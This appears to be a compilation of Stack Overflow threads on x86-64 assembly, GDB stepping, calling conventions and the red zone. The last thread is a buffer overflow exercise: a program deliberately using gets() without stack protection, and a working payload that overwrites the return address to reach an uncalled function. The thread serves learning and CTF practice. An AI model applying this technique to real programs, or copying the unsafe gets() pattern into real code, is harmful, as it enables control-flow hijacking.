How is main() called? Call to main() inside __libc_start_main() - c

I am trying to understand the call to main() inside __libc_start_main(). I know one of the parameters of __libc_start_main() is the address of main(). However, I cannot figure out how main() is being called inside __libc_start_main(), as there is no CALL or JMP opcode. I see the following disassembly right before execution jumps to main().
0x7ffff7ded08b <__libc_start_main+203>: lea rax,[rsp+0x20]
0x7ffff7ded090 <__libc_start_main+208>: mov QWORD PTR fs:0x300,rax
=> 0x7ffff7ded099 <__libc_start_main+217>: mov rax,QWORD PTR [rip+0x1c3e10] # 0x7ffff7fb0eb0
I wrote a simple "Hello, World!!" in C. In the assembly above:
The execution jumps to main() right after instruction at address 0x7ffff7ded099.
Why is the MOV (to RAX) instruction causing a jump to main()?

Well, of course those instructions are not the ones that cause the call to main. I am not sure how you are stepping through those instructions, but if you are using GDB, you should use stepi instead of nexti.
I don't know why this happens precisely (some strange GDB or x86 quirk?) so I only speak from personal experience, but when reverse-engineering ELF binaries, I occasionally find that the nexti command executes several instructions before breaking. In your case, it misses a few movs before the actual call rax to call main().
What you can do to remediate this is to either use stepi, or to dump more code and then explicitly tell GDB to set breakpoints:
(gdb) x/20i $pc
0x7ffff7ded08b <__libc_start_main+203>: lea rax,[rsp+0x20]
0x7ffff7ded090 <__libc_start_main+208>: mov QWORD PTR fs:0x300,rax
=> 0x7ffff7ded099 <__libc_start_main+217>: mov rax,QWORD PTR [rip+0x1c3e10] # 0x7ffff7fb0eb0
... more lines ...
... find call rax ...
(gdb) b *0x7ffff7dedXXX <= replace this
(gdb) continue
Here's what __libc_start_main() on my system does to call main():
21b6f: 48 8d 44 24 20 lea rax,[rsp+0x20] ; start preparing args
21b74: 64 48 89 04 25 00 03 mov QWORD PTR fs:0x300,rax
21b7b: 00 00
21b7d: 48 8b 05 24 93 3c 00 mov rax,QWORD PTR [rip+0x3c9324]
21b84: 48 8b 74 24 08 mov rsi,QWORD PTR [rsp+0x8]
21b89: 8b 7c 24 14 mov edi,DWORD PTR [rsp+0x14]
21b8d: 48 8b 10 mov rdx,QWORD PTR [rax]
21b90: 48 8b 44 24 18 mov rax,QWORD PTR [rsp+0x18] ; get address of main
21b95: ff d0 call rax ; actual call to main()
21b97: 89 c7 mov edi,eax
21b99: e8 32 16 02 00 call 431d0 <exit@@GLIBC_2.2.5> ; exit(result of main)
The first three instructions are the same that you show. At the moment of call rax, rax will contain the address of main. After calling main, the result is moved into edi (first argument) and exit(result) is called.
Looking at glibc's source code for __libc_start_main(), we can see that this is exactly what happens:
/* ... */
#ifdef HAVE_CLEANUP_JMP_BUF
int not_first_call;
not_first_call = setjmp ((struct __jmp_buf_tag *) unwind_buf.cancel_jmp_buf);
if (__glibc_likely (! not_first_call))
{
/* ... a bunch of stuff ... */
/* Run the program. */
result = main (argc, argv, __environ MAIN_AUXVEC_PARAM);
}
else
{
/* ... a bunch of stuff ... */
}
#else
/* Nothing fancy, just call the function. */
result = main (argc, argv, __environ MAIN_AUXVEC_PARAM);
#endif
exit (result);
}
In my case I can see from the disassembly that HAVE_CLEANUP_JMP_BUF was defined when my glibc was compiled, so the actual call to main() is the one inside the if. I also suspect this is the case for your glibc.

Related

Change on rax register during debug session with gdb does not affect code execution

I'm planning to participate in some Capture the Flag (CTF) challenges in the near future. For that reason, I've decided to study assembly. As of now I'm focusing on the usage of the CPU registers. Following some examples that I found on the internet, I tried to debug a very simple "Hello World" program written in C to see how the CPU registers are used. My environment is Linux and GCC version 11. I compiled my code with the -g flag in order to include debug symbols.
Following is my very simple C source code:
#include <stdio.h>
int main (int argc, char** argv)
{
char message_c_str[] = "Hello World from C!";
printf("%s\n", message_c_str);
return 0;
}
Studying the disassembly of the main function, I understand that the string containing the message gets stored inside the RAX (and RDX registers?), before calling the printf function:
└─$ objdump -M intel -D main| grep -A20 main.:
0000000000001159 <main>:
1159: 55 push rbp
115a: 48 89 e5 mov rbp,rsp
115d: 48 83 ec 30 sub rsp,0x30
1161: 89 7d dc mov DWORD PTR [rbp-0x24],edi
1164: 48 89 75 d0 mov QWORD PTR [rbp-0x30],rsi
1168: 48 b8 48 65 6c 6c 6f movabs rax,0x6f57206f6c6c6548
116f: 20 57 6f
1172: 48 ba 72 6c 64 20 66 movabs rdx,0x6d6f726620646c72
1179: 72 6f 6d
117c: 48 89 45 e0 mov QWORD PTR [rbp-0x20],rax
1180: 48 89 55 e8 mov QWORD PTR [rbp-0x18],rdx
1184: c7 45 f0 20 43 21 00 mov DWORD PTR [rbp-0x10],0x214320
118b: 48 8d 45 e0 lea rax,[rbp-0x20]
118f: 48 89 c7 mov rdi,rax
1192: e8 b9 fe ff ff call 1050 <puts@plt>
1197: b8 00 00 00 00 mov eax,0x0
119c: c9 leave
119d: c3 ret
I decided to start a debug session and change RAX on the fly, just to see whether I could change the string content before it is printed on the command line. Unfortunately, even though it seems that I can change the RAX value, the program still prints the hard-coded message, and I'm not sure why. Is there a gdb command I need to run after updating the value of RAX?
Following is my debug session with the issue:
┌──(alexis㉿kali)-[~/Desktop/Hacking/hello_world]
└─$ gdb -q main
Reading symbols from main...
(gdb) break main
Breakpoint 1 at 0x1168: file /home/alexis/Desktop/Hacking/hello_world/main.cpp, line 5.
(gdb) run
Starting program: /home/alexis/Desktop/Hacking/hello_world/main
Breakpoint 1, main (argc=1, argv=0x7fffffffdf58) at
/home/alexis/Desktop/Hacking/hello_world/main.cpp:5
5 char message_c_str[] = "Hello World from C!";
(gdb) info register rax
rax 0x555555555159 93824992235865
(gdb) next
6 printf("%s\n", message_c_str);
(gdb) info register rax
rax 0x6f57206f6c6c6548 8022916924116329800
(gdb) set $rax=0x6361636361
(gdb) info register rax
rax 0x6361636361 426835665761
(gdb) next
Hello World from C!
8 return 0;
(gdb)
You can see that the code still prints "Hello World from C!", even if the RAX register changed. Why?
The string is only temporarily in rax+rdx. In the following lines it is placed on the stack and the address goes to rdi, that is used by puts.
What's important here is to understand that one line of source code is translated to multiple lines of assembly. When you change the rax on line printf("%s\n", message_c_str); the string is already pushed on the stack and rax only keeps an old value as it wasn't overwritten by anything. It is no longer the string that's being printed.
To accomplish your goal you would have to change the string on the stack or change it in rax before it's being pushed onto it (so before your next command).
Also be aware that next advances one source code line. If you want to move by one assembly instruction, use nexti; that gives you more control over what gets executed.
You're using next (whole block of asm corresponding to a C source line), not nexti or stepi (aka ni or si) to step by asm instruction.
And you made a debug build so GCC doesn't keep anything in registers across C statements. The points where execution stops with next are the ones where the compiler-generated instructions are about to load or LEA a new RAX, so its current value is dead and doesn't matter.
(And it's only using RAX at all because it's a debug build with GCC; otherwise things like lea rax,[rbp-0x20] / mov rdi,rax would LEA straight into RDI, instead of uselessly using RAX as a temporary. See "Return value from writing an unused parameter when falling off the end of a non-void function". For mov-immediate to memory, though, there's no mov r/m64, imm64, only to register, so those moves to RAX and RDX do make sense.)
If you wanted to have it print something different, you could si until after movabs rax,0x6f57206f6c6c6548 but before mov QWORD PTR [rbp-0x20],rax, and at that point change the initializer for part of the string data. (Which is in RAX at that point.) e.g. introducing a 0x00 byte will terminate the C string.
Or right before the call puts, you could set $rdi = $rdi+5 to be like puts(message_c_str + 5).
layout reg or layout asm (use layout next / prev to fix the display if it's broken) are helpful for seeing where execution is. See other GDB asm tips at the bottom of https://stackoverflow.com/tags/x86/info

Why does GCC use additional registers for pushing values onto the stack? [duplicate]

This question already has an answer here:
Why does the x86-64 System V calling convention pass args in registers instead of just the stack?
This C code
void test_function(int a, int b, int c, int d) {}
int main() {
test_function(1, 2, 3, 4);
return 0;
}
gets compiled by GCC (no flags, version 12.1.1, target x86_64-redhat-linux) into
0000000000401106 <test_function>:
401106: 55 push rbp
401107: 48 89 e5 mov rbp,rsp
40110a: 89 7d fc mov DWORD PTR [rbp-0x4],edi
40110d: 89 75 f8 mov DWORD PTR [rbp-0x8],esi
401110: 89 55 f4 mov DWORD PTR [rbp-0xc],edx
401113: 89 4d f0 mov DWORD PTR [rbp-0x10],ecx
401116: 90 nop
401117: 5d pop rbp
401118: c3 ret
0000000000401119 <main>:
401119: 55 push rbp
40111a: 48 89 e5 mov rbp,rsp
40111d: b9 04 00 00 00 mov ecx,0x4
401122: ba 03 00 00 00 mov edx,0x3
401127: be 02 00 00 00 mov esi,0x2
40112c: bf 01 00 00 00 mov edi,0x1
401131: e8 d0 ff ff ff call 401106 <test_function>
401136: b8 00 00 00 00 mov eax,0x0
40113b: 5d pop rbp
40113c: c3 ret
Why are additional registers (ecx, edx, esi, edi) used as intermediary storage for values 1, 2, 3, 4 instead of putting them into rbp directly?
"as intermediary storage": Your confusion seems to be this part.
The ABI specifies that these function arguments are passed in the registers you are seeing (see comments under the question). The registers are not just used as intermediaries. The values are never supposed to be put on the stack at all. They stay in their registers the whole time, unless the function needs to reuse a register for something else, pass on a pointer to the function parameter, or something similar.
What you are seeing in test_function is just an artifact of not compiling with optimizations enabled. The mov instructions putting the registers on the stack are pointless, since nothing is done with them afterwards. The stack pointer is just immediately restored and then the function returns.
The whole function should just be a single ret instruction. See https://godbolt.org/z/qG9GjMohY where -O2 is used.
Without optimizations enabled the compiler makes no attempt to remove instructions even if they are pointless and it always stores values of variables to memory and loads them from memory again, even if they could have been held in registers. That's why it is almost always pointless to look at -O0 assembly.
The registers are used for the arguments to call the function. The standard calling convention calls for arguments to be placed in certain registers, so the code you see in main puts the arguments into those registers, and the code in test_function expects them in those registers and reads them from there.
So your follow-on question might be "why is test_function copying those arguments onto the stack?". That's because you're compiling without optimization, so the compiler produces inefficient code, allocating space in the stack frame for every argument and local variable and copying the arguments from their input registers into the stack frame as part of the function prologue. If you were to use those values in the function, you would see it reading them from the stack frame locations even though they are probably still in the registers. If you compile with -O, you'll see the compiler get rid of all this, as the stack frame is not needed.

Why does this function return the size of the array when there is no return statement?

I'm getting output as 8 for this program. Why is this function returning size of array when there is no return statement? It is working properly when I write the return statement but I'm still curious why this function is returning the size of array. I thought it should return garbage value.
#include <stdio.h>
int sumofelements(int A[],int size)
{
int i,sum=0;
for(i=0;i<size;i++)
sum = sum + A[i];
}
int main()
{
int A[]={3,4,5,6,3,6,1,10};
int size=sizeof(A)/sizeof(A[0]);
int total=sumofelements(A,size);
printf("sum of the elements=%d",total);
}
The behavior is undefined. Any value is possible, including the observed behavior. And on some exotic architectures, a trap value might cause other strange behavior.
For your particular case, the place where sumofelements is expected by main to have placed its return value (some CPU register) happens to contain the value of size, but no guarantee whatsoever: it might not on a different combination of CPU/OS/compiler/set of options/time of day...
Use gcc -Wall -Werror or a similar warning level to avoid such silly mistakes.
You can look at the assembly and behavior on Godbolt's Compiler Explorer and play with compiler flags and compiler versions to see how volatile the behavior is. With -O2, both gcc and clang generate a simple ret instruction for sumofelements and do not even call this function for the printf call.
Not explicitly returning a value from a non-void function (except main()) results in undefined behavior. This means that anything can happen: a crash, a garbage return value, or worst of all, the expected value!
You should always return something (meaningful) from a non-void function.
Return values are picked up from eax, which is a register on your CPU (registers are like your CPU's own place to store small amounts of data outside of RAM). It just so happened that eax contained the size of the array right before your function ended.
Probably in i < size, size is stored in eax and is not modified any further until your function ends, but you would have to objdump -d your program and paste it here for me to say anything certain.
If you want to learn more type “CPU registers” and read some stuff online.
I will extend my answer just for the sake of doing it.
OK, I copied your code and compiled it using GCC MinGW and disassembled it using objdump. Now here is the disassembly:
0000000000000000 <sumofelements>:
0: 55 push rbp
1: 48 89 e5 mov rbp,rsp
4: 48 89 7d e8 mov QWORD PTR [rbp-0x18],rdi
8: 89 75 e4 mov DWORD PTR [rbp-0x1c],esi
b: c7 45 f8 00 00 00 00 mov DWORD PTR [rbp-0x8],0x0
12: c7 45 fc 00 00 00 00 mov DWORD PTR [rbp-0x4],0x0
19: eb 1d jmp 38 <sumofelements+0x38>
1b: 8b 45 fc mov eax,DWORD PTR [rbp-0x4]
1e: 48 98 cdqe
20: 48 8d 14 85 00 00 00 lea rdx,[rax*4+0x0]
27: 00
28: 48 8b 45 e8 mov rax,QWORD PTR [rbp-0x18]
2c: 48 01 d0 add rax,rdx
2f: 8b 00 mov eax,DWORD PTR [rax]
31: 01 45 f8 add DWORD PTR [rbp-0x8],eax
34: 83 45 fc 01 add DWORD PTR [rbp-0x4],0x1
38: 8b 45 fc mov eax,DWORD PTR [rbp-0x4]
3b: 3b 45 e4 cmp eax,DWORD PTR [rbp-0x1c]
3e: 7c db jl 1b <sumofelements+0x1b>
40: 90 nop
41: 5d pop rbp
42: c3 ret
If you examine the disassembly, you can see that the last modification of eax was at offset 0x38; after that, the loop ends and we return. This line in particular
mov eax,DWORD PTR [rbp-0x4]
is the line before the loop checks for i < size. The line moves [rbp-0x4] to eax. If we go back to the start of the program, we can see that [rbp-0x4] is i.
Considering all of this, everything makes sense. For the loop to end, i < size must evaluate to false. Since size is 8, i must also be 8 for the loop to end. The value of i is moved into eax to check whether it is smaller than size, and on the iteration where the loop ends, i has the value 8 and therefore eax is also 8. The loop ends and we return what is in eax. So as a matter of fact it wasn't size in eax, as I initially guessed, but rather i.

Compiler using local variables without adjusting RSP

In question Compilers: Understanding assembly code generated from small programs the compiler uses two local variables without adjusting the stack pointer.
Not adjusting RSP for the use of local variables does not seem interrupt safe, so the compiler seems to rely on the hardware automatically switching to a system stack when interrupts occur. Otherwise, the first interrupt that came along would push the instruction pointer onto the stack and overwrite the local variable.
The code from that question is:
#include <stdio.h>
int main()
{
for(int i=0;i<10;i++){
int k=0;
}
}
The assembly code generated by that compiler is:
00000000004004d6 <main>:
4004d6: 55 push rbp
4004d7: 48 89 e5 mov rbp,rsp
4004da: c7 45 f8 00 00 00 00 mov DWORD PTR [rbp-0x8],0x0
4004e1: eb 0b jmp 4004ee <main+0x18>
4004e3: c7 45 fc 00 00 00 00 mov DWORD PTR [rbp-0x4],0x0
4004ea: 83 45 f8 01 add DWORD PTR [rbp-0x8],0x1
4004ee: 83 7d f8 09 cmp DWORD PTR [rbp-0x8],0x9
4004f2: 7e ef jle 4004e3 <main+0xd>
4004f4: b8 00 00 00 00 mov eax,0x0
4004f9: 5d pop rbp
4004fa: c3 ret
The local variables are i at [rbp-0x8] and k at [rbp-0x4].
Can anyone shine light on this interrupt problem? Does the hardware indeed switch to a system stack? How? Am I wrong in my understanding?
This is the so-called "red zone" of the x86-64 ABI. A summary from Wikipedia:
In computing, a red zone is a fixed-size area in a function's stack frame beyond the current stack pointer which is not preserved by that function. The callee function may use the red zone for storing local variables without the extra overhead of modifying the stack pointer. This region of memory is not to be modified by interrupt/exception/signal handlers. The x86-64 ABI used by System V mandates a 128-byte red zone which begins directly under the current value of the stack pointer.
In 64-bit Linux user code this is OK, as long as no more than 128 bytes are used. It is an optimization used most prominently by leaf functions, i.e. functions which don't call other functions.
If you were to compile the example program as a 64-bit Linux program with GCC (or compatible compiler) using the -mno-red-zone option you'd see code like this generated:
main:
push rbp
mov rbp, rsp
sub rsp, 16; <<============ Observe RSP is now being adjusted.
mov DWORD PTR [rbp-4], 0
.L3:
cmp DWORD PTR [rbp-4], 9
jg .L2
mov DWORD PTR [rbp-8], 0
add DWORD PTR [rbp-4], 1
jmp .L3
.L2:
mov eax, 0
leave
ret
This code generation can be observed at this godbolt.org link.
For a 32-bit Linux user program it would be a bad thing not to adjust the stack pointer. If you were to compile the code in the question as 32-bit code (using -m32 option) main would appear something like the following code:
main:
push ebp
mov ebp, esp
sub esp, 16; <<============ Observe ESP is being adjusted.
mov DWORD PTR [ebp-4], 0
.L3:
cmp DWORD PTR [ebp-4], 9
jg .L2
mov DWORD PTR [ebp-8], 0
add DWORD PTR [ebp-4], 1
jmp .L3
.L2:
mov eax, 0
leave
ret
This code generation can be observed at this godbolt.org link.

Buffer overflow appeared before it is expected

I'm trying to take control of a stack-based buffer overflow. First, here is an example of C code I compiled on a 32-bit Linux VM (gcc -fno-stack-protector -ggdb -o first first.c):
#include "stdio.h"
int CanNeverExecute()
{
printf("I can never execute\n");
return(0);
}
void GetInput()
{
char buffer[8];
gets(buffer);
puts(buffer);
}
int main()
{
GetInput();
return(0);
}
Then debugger (intel flavor): dump of assembler code for function GetInput:
0x08048455 <+0>: push ebp
0x08048456 <+1>: mov ebp,esp
0x08048458 <+3>: sub esp,0x28
0x0804845b <+6>: lea eax,[ebp-0x10]
Here we can see that sub esp, 0x28 reserves 40 bytes for a buffer variable (Right?).
CanNeverExecute function is located in address 0x0804843c.
So, in order to run CanNeverExecute function, I need to put 40 bytes into buffer variable, then goes 8 bytes for stored base pointer and then 8 bytes of return pointer I want to change.
So, I need a string of 48 ASCII symbols plus \x3c\x84\x04\x08 in the end (address of the CanNeverExecute function). That is in theory. But In practice I need only 20 bytes before address of the return pointer:
~/hacktest $ printf "12345678901234567890\x3c\x84\x04\x08" | ./first
12345678901234567890..
I can never execute
Illegal instruction (core dumped)
Why does it need only 20 bytes instead of 48? Where is my mistake?
First off, your assembly is 32-bit. Saved EBP and return address are 4 bytes each.
Second, the buffer variable does not start at stack top (ESP) - it starts at ebp-0x10. Which is 20 bytes away from the return address. 0x10 is 16 bytes, then 4 more for the saved EBP.
If you look at a larger part of the disassembly, you will see:
08048445 <GetInput>:
8048445: 55 push %ebp
8048446: 89 e5 mov %esp,%ebp
8048448: 83 ec 28 sub $0x28,%esp
804844b: 8d 45 f0 lea -0x10(%ebp),%eax
804844e: 89 04 24 mov %eax,(%esp)
8048451: e8 9a fe ff ff call 80482f0 <gets@plt>
8048456: 8d 45 f0 lea -0x10(%ebp),%eax
8048459: 89 04 24 mov %eax,(%esp)
804845c: e8 9f fe ff ff call 8048300 <puts@plt>
8048461: c9 leave
8048462: c3 ret
ebp is saved, esp is moved to ebp, then 40 is subtracted from esp (the stack frame, as you wrote),
but the pointer to buffer that is passed to gets is computed in eax (and then stored at the top of the stack as the argument), and eax is loaded with ebp-0x10!
lea -0x10(%ebp),%eax
So you need only 20 bytes to reach the return address (16 bytes from the start of the buffer up to ebp, plus 4 for the saved base pointer on a 32-bit system).

Resources